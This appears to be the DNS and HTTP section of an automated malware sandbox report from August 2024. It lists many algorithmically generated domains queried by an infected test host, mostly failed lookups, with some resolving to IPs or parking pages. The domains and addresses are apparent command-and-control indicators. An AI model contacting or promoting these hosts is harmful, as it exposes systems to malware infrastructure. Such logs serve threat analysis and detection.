Aug 23, 2024 18:43:34.341881990 CEST	1.1.1.1	192.168.2.5	0x8a28	Name error (3)	qeqyqul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.342472076 CEST	1.1.1.1	192.168.2.5	0x8380	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.344121933 CEST	1.1.1.1	192.168.2.5	0xa603	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.345093966 CEST	1.1.1.1	192.168.2.5	0x786b	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.345690012 CEST	1.1.1.1	192.168.2.5	0x3670	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.345690012 CEST	1.1.1.1	192.168.2.5	0x3670	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.453161955 CEST	1.1.1.1	192.168.2.5	0x4e93	Name error (3)	lysytyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.458719015 CEST	1.1.1.1	192.168.2.5	0xf058	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.458719015 CEST	1.1.1.1	192.168.2.5	0xf058	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.465533018 CEST	1.1.1.1	192.168.2.5	0x2f90	Name error (3)	qedytyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.471116066 CEST	1.1.1.1	192.168.2.5	0x4ad3	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.495321989 CEST	1.1.1.1	192.168.2.5	0x2105	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.500508070 CEST	1.1.1.1	192.168.2.5	0x48fb	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.506982088 CEST	1.1.1.1	192.168.2.5	0x8b52	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.507365942 CEST	1.1.1.1	192.168.2.5	0x2d7e	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.513559103 CEST	1.1.1.1	192.168.2.5	0x610	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.526957035 CEST	1.1.1.1	192.168.2.5	0xe0c0	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:34.550282001 CEST	1.1.1.1	192.168.2.5	0x1e87	No error (0)	lysyfyj.com		69.162.80.57	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:35.111363888 CEST	1.1.1.1	192.168.2.5	0x8940	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:35.111363888 CEST	1.1.1.1	192.168.2.5	0x8940	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:35.111363888 CEST	1.1.1.1	192.168.2.5	0x8940	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:35.111363888 CEST	1.1.1.1	192.168.2.5	0x8940	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:35.111363888 CEST	1.1.1.1	192.168.2.5	0x8940	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:35.111363888 CEST	1.1.1.1	192.168.2.5	0x8940	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:35.111363888 CEST	1.1.1.1	192.168.2.5	0x8940	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:35.111363888 CEST	1.1.1.1	192.168.2.5	0x8940	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:36.554604053 CEST	1.1.1.1	192.168.2.5	0xb375	No error (0)	ww6.galyqaz.com	82957.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:43:36.554604053 CEST	1.1.1.1	192.168.2.5	0xb375	No error (0)	82957.bodis.com		199.59.243.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:36.760659933 CEST	1.1.1.1	192.168.2.5	0x529c	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:36.760674000 CEST	1.1.1.1	192.168.2.5	0x529c	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:36.760682106 CEST	1.1.1.1	192.168.2.5	0x529c	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.969196081 CEST	1.1.1.1	192.168.2.5	0xe6d1	Name error (3)	ganyzub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.970576048 CEST	1.1.1.1	192.168.2.5	0x304b	Name error (3)	lykymox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.970725060 CEST	1.1.1.1	192.168.2.5	0x2d6a	Name error (3)	gatydaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.971941948 CEST	1.1.1.1	192.168.2.5	0x5590	No error (0)	pupydeq.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.971941948 CEST	1.1.1.1	192.168.2.5	0x5590	No error (0)	pupydeq.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.972695112 CEST	1.1.1.1	192.168.2.5	0xc56	Name error (3)	lyvylyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.975779057 CEST	1.1.1.1	192.168.2.5	0xba40	Name error (3)	vopydek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.975822926 CEST	1.1.1.1	192.168.2.5	0x9b05	Name error (3)	puvylyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.975837946 CEST	1.1.1.1	192.168.2.5	0x1cc3	Name error (3)	qegynuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.976430893 CEST	1.1.1.1	192.168.2.5	0xd2b5	Name error (3)	vocykem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.977268934 CEST	1.1.1.1	192.168.2.5	0x7811	Name error (3)	gahynus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.978948116 CEST	1.1.1.1	192.168.2.5	0xa965	Name error (3)	vowypit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.978962898 CEST	1.1.1.1	192.168.2.5	0x1346	Name error (3)	lygynud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.980390072 CEST	1.1.1.1	192.168.2.5	0xf171	Name error (3)	qexykaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.980509996 CEST	1.1.1.1	192.168.2.5	0x468d	Name error (3)	pufybyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.982055902 CEST	1.1.1.1	192.168.2.5	0xfe39	Name error (3)	lyxyjaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.982500076 CEST	1.1.1.1	192.168.2.5	0xbb36	Name error (3)	vofybyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.984838963 CEST	1.1.1.1	192.168.2.5	0xc801	Name error (3)	puzyjoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.984853029 CEST	1.1.1.1	192.168.2.5	0x5771	Name error (3)	lymytux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.987957954 CEST	1.1.1.1	192.168.2.5	0x3086	Name error (3)	qedyveg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.988850117 CEST	1.1.1.1	192.168.2.5	0x55c	Name error (3)	volyjok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.994375944 CEST	1.1.1.1	192.168.2.5	0x4255	Name error (3)	qebylug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.994621038 CEST	1.1.1.1	192.168.2.5	0xe8f3	Name error (3)	vojymic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.996124983 CEST	1.1.1.1	192.168.2.5	0x7288	Name error (3)	qetysal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.997507095 CEST	1.1.1.1	192.168.2.5	0x3501	Name error (3)	purypol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.997612000 CEST	1.1.1.1	192.168.2.5	0xe38b	Name error (3)	pujymip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:45.999046087 CEST	1.1.1.1	192.168.2.5	0x908c	Name error (3)	gacykeh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.001105070 CEST	1.1.1.1	192.168.2.5	0xf2de	Name error (3)	gaqypiz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.003920078 CEST	1.1.1.1	192.168.2.5	0x1de3	Name error (3)	qeqytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.005654097 CEST	1.1.1.1	192.168.2.5	0x7e90	Name error (3)	gadyveb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.011141062 CEST	1.1.1.1	192.168.2.5	0x4c43	No error (0)	lysyvan.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.011141062 CEST	1.1.1.1	192.168.2.5	0x4c43	No error (0)	lysyvan.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.011451006 CEST	1.1.1.1	192.168.2.5	0x71f5	Name error (3)	qekyhil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.011851072 CEST	1.1.1.1	192.168.2.5	0xd65a	Name error (3)	galyhiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.011985064 CEST	1.1.1.1	192.168.2.5	0xc690	Name error (3)	vonyryc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.012269974 CEST	1.1.1.1	192.168.2.5	0xd608	Name error (3)	pumytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.012624025 CEST	1.1.1.1	192.168.2.5	0xcca8	Name error (3)	ganyrys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.012638092 CEST	1.1.1.1	192.168.2.5	0xdee6	Name error (3)	lykygur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.012742043 CEST	1.1.1.1	192.168.2.5	0xa38e	Name error (3)	vopycom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.013159037 CEST	1.1.1.1	192.168.2.5	0x3607	Name error (3)	lyvywed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.013676882 CEST	1.1.1.1	192.168.2.5	0x5735	Name error (3)	gatycoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.015269041 CEST	1.1.1.1	192.168.2.5	0x725c	Name error (3)	puvywav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.015849113 CEST	1.1.1.1	192.168.2.5	0x3273	Name error (3)	gacyqob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.015914917 CEST	1.1.1.1	192.168.2.5	0x1ace	Name error (3)	vocyqaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.016202927 CEST	1.1.1.1	192.168.2.5	0xf8f	Name error (3)	lygyfex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.016314030 CEST	1.1.1.1	192.168.2.5	0x8c9a	Name error (3)	gahyfyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.016541958 CEST	1.1.1.1	192.168.2.5	0x8705	Name error (3)	puryxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.017491102 CEST	1.1.1.1	192.168.2.5	0x6098	Name error (3)	volymum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.017776966 CEST	1.1.1.1	192.168.2.5	0xe837	Name error (3)	vofydac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.017982960 CEST	1.1.1.1	192.168.2.5	0xaa79	Name error (3)	gaqyzuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.018037081 CEST	1.1.1.1	192.168.2.5	0x246a	Name error (3)	qexyqog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.018050909 CEST	1.1.1.1	192.168.2.5	0xe180	Name error (3)	qeqylyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.018321991 CEST	1.1.1.1	192.168.2.5	0x9c7d	Name error (3)	puzymig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.018791914 CEST	1.1.1.1	192.168.2.5	0x7fcf	Name error (3)	lymylyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.019398928 CEST	1.1.1.1	192.168.2.5	0x8f0b	Name error (3)	lyxymin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.034291029 CEST	1.1.1.1	192.168.2.5	0xfbee	Name error (3)	vojygut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.035361052 CEST	1.1.1.1	192.168.2.5	0x7635	Name error (3)	pujygul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.036190033 CEST	1.1.1.1	192.168.2.5	0xb926	Name error (3)	lyryxij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.036859989 CEST	1.1.1.1	192.168.2.5	0xc4cc	Name error (3)	pufydep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.043392897 CEST	1.1.1.1	192.168.2.5	0xf0c8	Name error (3)	gadydas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.161762953 CEST	1.1.1.1	192.168.2.5	0xadf3	Name error (3)	qetyxiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.166215897 CEST	1.1.1.1	192.168.2.5	0xe3a5	Name error (3)	vowyzuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.166565895 CEST	1.1.1.1	192.168.2.5	0x734b	Name error (3)	qebyrev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.190798044 CEST	1.1.1.1	192.168.2.5	0x78c7	No error (0)	pupycag.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:46.260128975 CEST	1.1.1.1	192.168.2.5	0xfed8	No error (0)	lyrysor.com	zz1985.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:43:46.260128975 CEST	1.1.1.1	192.168.2.5	0xfed8	No error (0)	zz1985.qu200.com	gtm-sg-6l13ukk0m05.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:43:46.260128975 CEST	1.1.1.1	192.168.2.5	0xfed8	No error (0)	gtm-sg-6l13ukk0m05.qu200.com		103.150.11.230	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.568134069 CEST	1.1.1.1	192.168.2.5	0xe935	Name error (3)	qedysov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.569046021 CEST	1.1.1.1	192.168.2.5	0x58c8	Name error (3)	pumylel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.578954935 CEST	1.1.1.1	192.168.2.5	0x8842	Name error (3)	qekynuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.579415083 CEST	1.1.1.1	192.168.2.5	0x1955	Name error (3)	pupypiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.579832077 CEST	1.1.1.1	192.168.2.5	0xde69	Name error (3)	ganykaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.580758095 CEST	1.1.1.1	192.168.2.5	0xbd4b	Name error (3)	lykynyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.581311941 CEST	1.1.1.1	192.168.2.5	0x7e89	Name error (3)	qebykap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.582227945 CEST	1.1.1.1	192.168.2.5	0x3d49	Name error (3)	gatypub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.583033085 CEST	1.1.1.1	192.168.2.5	0x2d57	Name error (3)	pujybyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.583045006 CEST	1.1.1.1	192.168.2.5	0xfdc0	Name error (3)	vopypif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.583794117 CEST	1.1.1.1	192.168.2.5	0x696a	Name error (3)	lyvyjox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.584434986 CEST	1.1.1.1	192.168.2.5	0x3d18	Name error (3)	qetytug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.585057974 CEST	1.1.1.1	192.168.2.5	0x940b	Name error (3)	vojybek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.585885048 CEST	1.1.1.1	192.168.2.5	0x52e2	Name error (3)	puvyjop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.591285944 CEST	1.1.1.1	192.168.2.5	0x493	Name error (3)	lyrytun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.591299057 CEST	1.1.1.1	192.168.2.5	0x1398	Name error (3)	purytyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.591309071 CEST	1.1.1.1	192.168.2.5	0x67f8	Name error (3)	vowyrym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.591397047 CEST	1.1.1.1	192.168.2.5	0x48d4	Name error (3)	pufycol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.598965883 CEST	1.1.1.1	192.168.2.5	0x344e	Name error (3)	lysysod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.600219011 CEST	1.1.1.1	192.168.2.5	0x90c6	Name error (3)	vonyket.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.601634026 CEST	1.1.1.1	192.168.2.5	0xdd3f	Name error (3)	gaqyreh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.601722002 CEST	1.1.1.1	192.168.2.5	0xd3a5	Name error (3)	qeqyreq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.602355003 CEST	1.1.1.1	192.168.2.5	0x86e6	Name error (3)	qedyxip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.602390051 CEST	1.1.1.1	192.168.2.5	0xdf2f	Name error (3)	puzyguv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.603051901 CEST	1.1.1.1	192.168.2.5	0xef1f	Name error (3)	lymywaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.603106976 CEST	1.1.1.1	192.168.2.5	0xf1be	Name error (3)	pumywaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.603122950 CEST	1.1.1.1	192.168.2.5	0x7e78	Name error (3)	lysyxux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.603194952 CEST	1.1.1.1	192.168.2.5	0x6653	Name error (3)	vonyqok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.603863955 CEST	1.1.1.1	192.168.2.5	0xef16	Name error (3)	galyfyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.604943037 CEST	1.1.1.1	192.168.2.5	0x6700	Name error (3)	ganyqow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.604953051 CEST	1.1.1.1	192.168.2.5	0xe523	Name error (3)	pujydag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.604964018 CEST	1.1.1.1	192.168.2.5	0x4e8	Name error (3)	pupyxup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.605243921 CEST	1.1.1.1	192.168.2.5	0x7f7b	Name error (3)	lyvymir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.606221914 CEST	1.1.1.1	192.168.2.5	0xfab	Name error (3)	gahydoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.606698036 CEST	1.1.1.1	192.168.2.5	0x7805	Name error (3)	gahyvew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.607666969 CEST	1.1.1.1	192.168.2.5	0x9ce0	Name error (3)	vojydam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.607728958 CEST	1.1.1.1	192.168.2.5	0xf90f	Name error (3)	puvymul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.613178968 CEST	1.1.1.1	192.168.2.5	0x3024	Name error (3)	lygyvar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.615474939 CEST	1.1.1.1	192.168.2.5	0x36e2	Name error (3)	vocymut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.616291046 CEST	1.1.1.1	192.168.2.5	0x2024	No error (0)	galynuh.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.620898008 CEST	1.1.1.1	192.168.2.5	0xbc0a	Name error (3)	qegysoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.622922897 CEST	1.1.1.1	192.168.2.5	0x91ff	Name error (3)	volygyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.623965025 CEST	1.1.1.1	192.168.2.5	0x534a	Name error (3)	lyxygud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.624867916 CEST	1.1.1.1	192.168.2.5	0xd82e	Name error (3)	purylev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.625479937 CEST	1.1.1.1	192.168.2.5	0x1adc	Name error (3)	qebyqil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.625972986 CEST	1.1.1.1	192.168.2.5	0x558a	Name error (3)	gatyzys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.626234055 CEST	1.1.1.1	192.168.2.5	0xeb7	Name error (3)	lykyfen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.628232002 CEST	1.1.1.1	192.168.2.5	0x774e	Name error (3)	lyryled.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.629730940 CEST	1.1.1.1	192.168.2.5	0xc5c1	Name error (3)	vopyzuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.633356094 CEST	1.1.1.1	192.168.2.5	0x868c	Name error (3)	gacynuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.637434959 CEST	1.1.1.1	192.168.2.5	0x7ebb	Name error (3)	vowykaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.645438910 CEST	1.1.1.1	192.168.2.5	0x8861	Name error (3)	qexynyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.645797014 CEST	1.1.1.1	192.168.2.5	0x600d	Name error (3)	pufypiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.654153109 CEST	1.1.1.1	192.168.2.5	0x7f91	Name error (3)	lygysij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.733388901 CEST	1.1.1.1	192.168.2.5	0xeb85	Name error (3)	gacyhis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.734286070 CEST	1.1.1.1	192.168.2.5	0xfee3	Name error (3)	vocyjic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.756159067 CEST	1.1.1.1	192.168.2.5	0x21	Name error (3)	qekyfeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.770829916 CEST	1.1.1.1	192.168.2.5	0x6752	Name error (3)	gaqykab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.778783083 CEST	1.1.1.1	192.168.2.5	0x5c53	Name error (3)	qetylyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.782661915 CEST	1.1.1.1	192.168.2.5	0x8307	No error (0)	gadyciz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.901906013 CEST	1.1.1.1	192.168.2.5	0xb10f	No error (0)	vofycot.com		103.224.182.252	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:04.921993017 CEST	1.1.1.1	192.168.2.5	0x473f	No error (0)	qegyval.com		154.85.183.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.008608103 CEST	1.1.1.1	192.168.2.5	0xd44	No error (0)	galynuh.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.063622952 CEST	1.1.1.1	192.168.2.5	0x3039	No error (0)	qexyhuv.com		15.197.240.20	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.078316927 CEST	1.1.1.1	192.168.2.5	0xc845	No error (0)	lyxynyx.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.081211090 CEST	1.1.1.1	192.168.2.5	0x5c47	No error (0)	qegyval.com		154.85.183.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.181545973 CEST	1.1.1.1	192.168.2.5	0x94ba	No error (0)	gadyciz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.361274004 CEST	1.1.1.1	192.168.2.5	0x6e10	No error (0)	vofycot.com		103.224.182.252	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.482532978 CEST	1.1.1.1	192.168.2.5	0x939b	No error (0)	qexyhuv.com		15.197.240.20	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.499916077 CEST	1.1.1.1	192.168.2.5	0x1c15	No error (0)	lyxynyx.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:05.500314951 CEST	1.1.1.1	192.168.2.5	0x1c15	No error (0)	lyxynyx.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:06.355490923 CEST	1.1.1.1	192.168.2.5	0x9b4d	No error (0)	ww16.vofycot.com	www.sedoparking.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:44:06.355490923 CEST	1.1.1.1	192.168.2.5	0x9b4d	No error (0)	www.sedoparking.com		64.190.63.136	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:06.355537891 CEST	1.1.1.1	192.168.2.5	0x9b4d	No error (0)	ww16.vofycot.com	www.sedoparking.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:44:06.355537891 CEST	1.1.1.1	192.168.2.5	0x9b4d	No error (0)	www.sedoparking.com		64.190.63.136	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:06.501450062 CEST	1.1.1.1	192.168.2.5	0xb024	No error (0)	ww25.lyxynyx.com	77026.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:44:06.501450062 CEST	1.1.1.1	192.168.2.5	0xb024	No error (0)	77026.bodis.com		199.59.243.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:44:06.501507044 CEST	1.1.1.1	192.168.2.5	0xb024	No error (0)	ww25.lyxynyx.com	77026.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:44:06.501507044 CEST	1.1.1.1	192.168.2.5	0xb024	No error (0)	77026.bodis.com		199.59.243.226	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.comuser-agent:

qegyhig.com

lysyvan.com

gahyqah.com

puzylyp.com

vocyzit.com

qetyfuv.com

lymyxid.com

vonypom.com

galyqaz.com

lyvyxor.com

lysyfyj.com

vojyqem.com

www.gahyqah.com
